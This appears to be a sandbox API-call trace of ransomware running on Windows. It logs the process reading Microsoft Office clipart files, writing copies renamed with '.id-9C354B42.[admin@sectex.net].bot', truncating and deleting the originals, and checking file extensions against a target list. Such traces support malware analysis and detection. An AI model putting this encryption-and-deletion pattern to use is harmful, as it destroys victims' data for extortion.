	[0148.716] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01759_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.716] GetLastError () returned 0x0
	[0148.716] ReadFile (in: hFile=0x3f0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1526, lpOverlapped=0x0) returned 1
	[0148.750] WriteFile (in: hFile=0x3f4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1530, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1530, lpOverlapped=0x0) returned 1
	[0148.751] ReadFile (in: hFile=0x3f0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.751] WriteFile (in: hFile=0x3f4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.751] SetEndOfFile (hFile=0x3f4) returned 1
	[0148.751] CloseHandle (hObject=0x3f4) returned 1
	[0148.752] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.752] SetEndOfFile (hFile=0x3f0) returned 1
	[0148.754] CloseHandle (hObject=0x3f0) returned 1
	[0148.754] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.806] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01759_.wmf")) returned 1
	[0148.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63
	[0148.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63
	[0148.837] lstrlenW (lpString=".doc") returned 4
	[0148.837] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.875] lstrlenW (lpString=".docx") returned 5
	[0148.876] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.876] lstrlenW (lpString=".pdf") returned 4
	[0148.886] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.886] lstrlenW (lpString=".xls") returned 4
	[0148.894] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.894] lstrlenW (lpString=".xlsx") returned 5
	[0148.894] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.894] lstrlenW (lpString=".ppt") returned 4
	[0148.894] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63
	[0148.894] lstrlenW (lpString=".zip") returned 4
	[0148.894] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.894] lstrlenW (lpString=".rar") returned 4
	[0148.894] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.894] lstrlenW (lpString=".bz2") returned 4
	[0148.894] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.894] lstrlenW (lpString=".7z") returned 3
	[0148.894] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63
	[0148.894] lstrlenW (lpString=".dbf") returned 4
	[0148.894] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63
	[0148.894] lstrlenW (lpString=".1cd") returned 4
	[0148.894] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63
	[0148.894] lstrlenW (lpString=".jpg") returned 4
	[0148.894] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63
	[0148.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63
	[0148.894] lstrlenW (lpString=".doc") returned 4
	[0148.894] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.894] lstrlenW (lpString=".docx") returned 5
	[0148.894] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.894] lstrlenW (lpString=".pdf") returned 4
	[0148.894] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.895] lstrlenW (lpString=".xls") returned 4
	[0148.895] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.895] lstrlenW (lpString=".xlsx") returned 5
	[0148.895] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.895] lstrlenW (lpString=".ppt") returned 4
	[0148.895] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63
	[0148.895] lstrlenW (lpString=".zip") returned 4
	[0148.895] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.895] lstrlenW (lpString=".rar") returned 4
	[0148.895] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.895] lstrlenW (lpString=".bz2") returned 4
	[0148.895] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.895] lstrlenW (lpString=".7z") returned 3
	[0148.895] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63
	[0148.895] lstrlenW (lpString=".dbf") returned 4
	[0148.895] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63
	[0148.895] lstrlenW (lpString=".1cd") returned 4
	[0148.895] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63
	[0148.895] lstrlenW (lpString=".jpg") returned 4
	[0148.895] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.895] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0148.895] lstrlenW (lpString="HH02166_.WMF") returned 12
	[0148.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02166_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.035] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=1324) returned 1
	[0149.035] CloseHandle (hObject=0x3dc) returned 1
	[0149.035] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02166_.wmf")) returned 0x20
	[0149.051] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02166_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02166_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0149.051] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.051] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02166_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4
	[0149.112] GetLastError () returned 0x0
	[0149.113] ReadFile (in: hFile=0x3d0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x52c, lpOverlapped=0x0) returned 1
	[0149.139] WriteFile (in: hFile=0x3e4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x530, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x530, lpOverlapped=0x0) returned 1
	[0149.140] ReadFile (in: hFile=0x3d0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.140] WriteFile (in: hFile=0x3e4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.140] SetEndOfFile (hFile=0x3e4) returned 1
	[0149.140] CloseHandle (hObject=0x3e4) returned 1
	[0149.141] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.141] SetEndOfFile (hFile=0x3d0) returned 1
	[0149.143] CloseHandle (hObject=0x3d0) returned 1
	[0149.143] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.143] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02166_.wmf")) returned 1
	[0149.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63
	[0149.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63
	[0149.144] lstrlenW (lpString=".doc") returned 4
	[0149.144] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.144] lstrlenW (lpString=".docx") returned 5
	[0149.144] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.144] lstrlenW (lpString=".pdf") returned 4
	[0149.144] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.144] lstrlenW (lpString=".xls") returned 4
	[0149.144] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.144] lstrlenW (lpString=".xlsx") returned 5
	[0149.144] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.144] lstrlenW (lpString=".ppt") returned 4
	[0149.144] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63
	[0149.144] lstrlenW (lpString=".zip") returned 4
	[0149.144] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.144] lstrlenW (lpString=".rar") returned 4
	[0149.144] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.144] lstrlenW (lpString=".bz2") returned 4
	[0149.144] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.144] lstrlenW (lpString=".7z") returned 3
	[0149.144] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63
	[0149.144] lstrlenW (lpString=".dbf") returned 4
	[0149.144] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63
	[0149.145] lstrlenW (lpString=".1cd") returned 4
	[0149.145] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63
	[0149.145] lstrlenW (lpString=".jpg") returned 4
	[0149.145] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63
	[0149.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63
	[0149.145] lstrlenW (lpString=".doc") returned 4
	[0149.145] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.145] lstrlenW (lpString=".docx") returned 5
	[0149.145] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.145] lstrlenW (lpString=".pdf") returned 4
	[0149.145] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.145] lstrlenW (lpString=".xls") returned 4
	[0149.145] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.145] lstrlenW (lpString=".xlsx") returned 5
	[0149.145] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.145] lstrlenW (lpString=".ppt") returned 4
	[0149.145] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63
	[0149.145] lstrlenW (lpString=".zip") returned 4
	[0149.145] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.145] lstrlenW (lpString=".rar") returned 4
	[0149.145] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.145] lstrlenW (lpString=".bz2") returned 4
	[0149.145] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.145] lstrlenW (lpString=".7z") returned 3
	[0149.145] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63
	[0149.145] lstrlenW (lpString=".dbf") returned 4
	[0149.145] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63
	[0149.146] lstrlenW (lpString=".1cd") returned 4
	[0149.146] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63
	[0149.146] lstrlenW (lpString=".jpg") returned 4
	[0149.146] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.146] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.146] lstrlenW (lpString="HM00005_.WMF") returned 12
	[0149.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00005_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0149.162] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=23300) returned 1
	[0149.162] CloseHandle (hObject=0x2a0) returned 1
	[0149.162] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00005_.wmf")) returned 0x20
	[0149.162] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00005_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00005_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0149.162] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.162] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.163] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00005_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0149.163] GetLastError () returned 0x0
	[0149.163] ReadFile (in: hFile=0x2a0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x5b04, lpOverlapped=0x0) returned 1
	[0149.165] WriteFile (in: hFile=0x3d0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x5b10, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x5b10, lpOverlapped=0x0) returned 1
	[0149.166] ReadFile (in: hFile=0x2a0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.166] WriteFile (in: hFile=0x3d0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.166] SetEndOfFile (hFile=0x3d0) returned 1
	[0149.167] CloseHandle (hObject=0x3d0) returned 1
	[0149.167] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.167] SetEndOfFile (hFile=0x2a0) returned 1
	[0149.169] CloseHandle (hObject=0x2a0) returned 1
	[0149.169] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.169] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00005_.wmf")) returned 1
	[0149.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 63
	[0149.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 63
	[0149.170] lstrlenW (lpString=".doc") returned 4
	[0149.170] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.170] lstrlenW (lpString=".docx") returned 5
	[0149.170] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.170] lstrlenW (lpString=".pdf") returned 4
	[0149.170] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.170] lstrlenW (lpString=".xls") returned 4
	[0149.170] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.170] lstrlenW (lpString=".xlsx") returned 5
	[0149.170] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.170] lstrlenW (lpString=".ppt") returned 4
	[0149.170] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 63
	[0149.170] lstrlenW (lpString=".zip") returned 4
	[0149.170] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.170] lstrlenW (lpString=".rar") returned 4
	[0149.170] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.170] lstrlenW (lpString=".bz2") returned 4
	[0149.170] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.170] lstrlenW (lpString=".7z") returned 3
	[0149.171] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 63
	[0149.171] lstrlenW (lpString=".dbf") returned 4
	[0149.171] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 63
	[0149.171] lstrlenW (lpString=".1cd") returned 4
	[0149.171] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 63
	[0149.171] lstrlenW (lpString=".jpg") returned 4
	[0149.171] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 63
	[0149.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 63
	[0149.171] lstrlenW (lpString=".doc") returned 4
	[0149.171] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.171] lstrlenW (lpString=".docx") returned 5
	[0149.171] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.171] lstrlenW (lpString=".pdf") returned 4
	[0149.171] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.171] lstrlenW (lpString=".xls") returned 4
	[0149.171] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.171] lstrlenW (lpString=".xlsx") returned 5
	[0149.171] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.171] lstrlenW (lpString=".ppt") returned 4
	[0149.171] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 63
	[0149.171] lstrlenW (lpString=".zip") returned 4
	[0149.171] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.171] lstrlenW (lpString=".rar") returned 4
	[0149.171] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.171] lstrlenW (lpString=".bz2") returned 4
	[0149.172] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.172] lstrlenW (lpString=".7z") returned 3
	[0149.172] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 63
	[0149.172] lstrlenW (lpString=".dbf") returned 4
	[0149.172] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 63
	[0149.172] lstrlenW (lpString=".1cd") returned 4
	[0149.172] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 63
	[0149.172] lstrlenW (lpString=".jpg") returned 4
	[0149.172] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.172] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.172] lstrlenW (lpString="HM00116_.WMF") returned 12
	[0149.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00116_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0149.173] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=15852) returned 1
	[0149.173] CloseHandle (hObject=0x2a0) returned 1
	[0149.173] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00116_.wmf")) returned 0x20
	[0149.173] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00116_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0149.173] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.173] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
